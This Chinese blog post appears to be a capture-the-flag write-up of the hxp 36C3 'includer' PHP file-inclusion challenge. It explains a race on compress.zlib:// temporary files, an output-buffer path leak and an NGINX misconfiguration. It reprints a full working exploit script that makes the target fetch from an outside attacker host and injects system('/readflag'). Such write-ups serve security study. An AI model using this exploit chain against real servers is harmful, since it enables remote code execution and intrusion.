WEB安全--文件上传漏洞--36C3 CTF includer bypass

发布于:2025-04-05 ⋅ 阅读:(20) ⋅ 点赞:(0)
<?php
declare(strict_types=1);

$rand_dir = 'files/'.bin2hex(random_bytes(32));
mkdir($rand_dir) || die('mkdir');
putenv('TMPDIR='.__DIR__.'/'.$rand_dir) || die('putenv');
echo 'Hello '.$_POST['name'].' your sandbox: '.$rand_dir."\n";

try {
    if (stripos(file_get_contents($_POST['file']), '<?') === false) {
        include_once($_POST['file']);
    }
}
finally {
    system('rm -rf '.escapeshellarg($rand_dir));
}

文件包含位置:include_once($_POST['file']);

我们的目的是上传php文件让该函数包含执行其中的php代码。

不过可以看到有重重阻碍:
        $rand_dir:生成临时文件目录

        stripos(file_get_contents($_POST['file']), '<?'):检测文件中是否包含 PHP 代码的开头标签<?

如果我们想上传php文件,并且执行,就得先思考如何绕过<?的检测:

        这里可以使用一直上传大量数据的垃圾文件与检测后端建立连接,然后在file_get_contents()识别垃圾文件内容时认为是无害的这个时候上传我们的<?php?>内容的文件,也就是说tmp文件需要在这两种文件之间疯狂切换。

compress.zlib://

流封装器(Stream Wrapper),用于直接对文件进行 Zlib 压缩或解压缩 读写操作。

不过了解了php底层对这个功能的描述后,发现我们可以用它创建包含任意内容的临时文件:

PHPAPI int _php_stream_make_seekable(php_stream *origstream, php_stream **newstream, int flags STREAMS_DC)
{
    if (newstream == NULL) {
        return PHP_STREAM_FAILED;
    }
    *newstream = NULL;

    if (((flags & PHP_STREAM_FORCE_CONVERSION) == 0) && origstream->ops->seek != NULL) {
        *newstream = origstream;
        return PHP_STREAM_UNCHANGED;
    }

    /* 创建临时文件并将数据流存入其中 */

    if (flags & PHP_STREAM_PREFER_STDIO) {
        *newstream = php_stream_fopen_tmpfile();
    } else {
        *newstream = php_stream_temp_new();
    }
  // ... 

现在我们能够上传垃圾临时文件了,假如我们上传成功了,那我们去哪得到文件文件路径呢?

这就涉及到利用大量name参数导致PHP output buffer溢出

name={}&file=compress.zlib://http://kaibro.tw:5487'''.format("a"*8050).replace("\n","\r\n")

最后有了路径我们还得通过NGINX配置错误获得临时文件名

.well-known../files/sandbox/

通过访问临时文件位置执行文件包含漏洞

所以整个流程总结如下:

1、利用compress.zlip://http:// 来上传垃圾文件,并保持HTTP长链接竞争保存我们的临时文件

2、利用超长name溢出 output buffer 得到sandbox路径

3、利用NGINX配置错误获取tmp文件文件名

4、发送另一个请求包含我们的tmp文件,此时并没有PHP代码

5、绕过stripos(file_get_contents($_POST['file']), '<?')检测后,发送PHP代码,include_once()包含PHP代码执行

官方解析:

hxp 36C3 CTF

官方payload:

from pwn import *
import requests
import re
import threading
import time

for gg in range(100):

    r = remote("78.47.165.85", 8004)
    l = listen(5487)

    payload = '''POST / HTTP/1.1
Host: 78.47.165.85:8004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Content-Length: 8098
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1

name={}&file=compress.zlib://http://kaibro.tw:5487'''.format("a"*8050).replace("\n","\r\n")


    r.send(payload)
    r.recvuntil("your sandbox: ")
    dirname = r.recv(70)

    print("[DEBUG]:" + dirname)

    # send trash
    c = l.wait_for_connection()
    resp = '''HTTP/1.1 200 OK
Date: Sun, 29 Dec 2019 05:22:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 534
Content-Type: text/html; charset=UTF-8

AAA
BBB'''.replace("\n","\r\n")
    c.send(resp)


    # get filename
    r2 = requests.get("http://78.47.165.85:8004/.well-known../"+ dirname + "/")
    tmpname = "php" + re.findall(">php(.*)<\/a",r2.text)[0]
    print("[DEBUG]:" + tmpname)

    def job():
        time.sleep(0.26)
        phpcode = 'wtf<?php system("/readflag");?>';
        c.send(phpcode)

    t = threading.Thread(target = job)
    t.start()

    # file_get_contents and include tmp file
    exp_file = dirname + "/" + tmpname
    print("[DEBUG]:"+exp_file)
    r3 = requests.post("http://78.47.165.85:8004/", data={'file':exp_file})
    print(r3.status_code,r3.text)
    if "wtf" in r3.text:
        break

    t.join()
    r.close()
    l.close()
    #r.interactive()


网站公告

今日签到

点亮在社区的每一天
去签到